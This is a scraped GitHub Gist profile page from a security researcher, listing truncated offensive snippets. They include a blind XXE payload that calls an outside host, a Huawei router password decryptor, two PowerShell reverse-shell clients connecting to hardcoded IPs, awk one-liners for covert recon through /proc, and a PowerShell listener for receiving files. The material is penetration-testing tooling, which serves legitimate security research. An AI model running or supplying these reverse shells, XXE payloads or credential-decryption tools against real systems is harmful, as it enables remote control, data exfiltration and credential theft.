Skip to content

Instantly share code, notes, and snippets.

Avatar

Etienne Stalmans staaldraad

View GitHub Profile
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@staaldraad
staaldraad / huaweiDecrypt.py
Created Mar 11, 2015
Decrypt Huawei router/firewall passwords. Huawei stores passwords using DES encryption when the crypted option is enabled.
View huaweiDecrypt.py
#!/usr/bin/python
"""
Simple tool to extract local users and passwords from most Huawei routers/firewalls config files.
Will extract plain-text passwords and crypted credentials. Huawei config files use DES encryption with
a known key. Using this information, the script will decrypt credentials found in the config file.
Author: Etienne Stalmans (etienne@sensepost.com)
Version: 1.0 (12/01/2014)
"""
from Crypto.Cipher import DES
@staaldraad
staaldraad / mini-reverse.ps1
Created Oct 3, 2016
A reverse shell in Powershell
View mini-reverse.ps1
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
@staaldraad
staaldraad / uid_awk.sh
Created Dec 12, 2017
Get the uid, gid and user groups without touching /etc/passwd or running the `id` command
View uid_awk.sh
awk -F: 'END {print "uid:"u" gid:"g" groups:"gg}{if($1=="Uid"){split($2,a," ");u=a[1]}if($1=="Gid"){split($2,a," ");g=a[1]}if($1=="Groups"){gg=$2}}' /proc/self/status
@staaldraad
staaldraad / awk_netstat.sh
Last active Oct 31, 2020
AWK to get details from /proc/net/tcp and /proc/net/udp when netstat and lsof are not available
View awk_netstat.sh
# Gawk version
# Remote
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
# Local
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
# No Gawk
# Local
grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){
@staaldraad
staaldraad / webdavserv.go
Last active Oct 12, 2020
A small webdav server in go
View webdavserv.go
package main
import (
"flag"
"fmt"
"log"
"net/http"
"os"
"golang.org/x/net/webdav"
@staaldraad
staaldraad / minRev.ps1
Last active Aug 20, 2020
Simple reverse shell in Powershell
View minRev.ps1
$socket = new-object System.Net.Sockets.TcpClient('10.10.10.2', 8080);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do{
$writer.Write("> ");
$writer.Flush();
$read = $null;
View str2quote.py
#!/usr/env/python
print("Converts a string to the {QUOTE} Field code")
st = raw_input("String to convert: ")
v = map(lambda y: "%s"%ord(y),st)
print("{ QUOTE %s }"%' '.join(v))
@staaldraad
staaldraad / oauthServer.go
Last active Jul 14, 2020
A mini OAuth server for Azure
View oauthServer.go
package main
import (
"crypto/tls"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"strings"
)
@staaldraad
staaldraad / receivefile.ps1
Created Feb 24, 2017
Small powershell script to bind to port, accept connection and stream to file. useful for ```cat blah.exe | nc 192.168.1.7 8080```
View receivefile.ps1
$socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080);
if($socket -eq $null){
exit 1;
}
$socket.start();
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;
$file = 'c:/afile.exe';
$fileStream = New-Object System.IO.FileStream($file, [System.IO.FileMode]'Create', [System.IO.FileAccess]'Write');
You can’t perform that action at this time.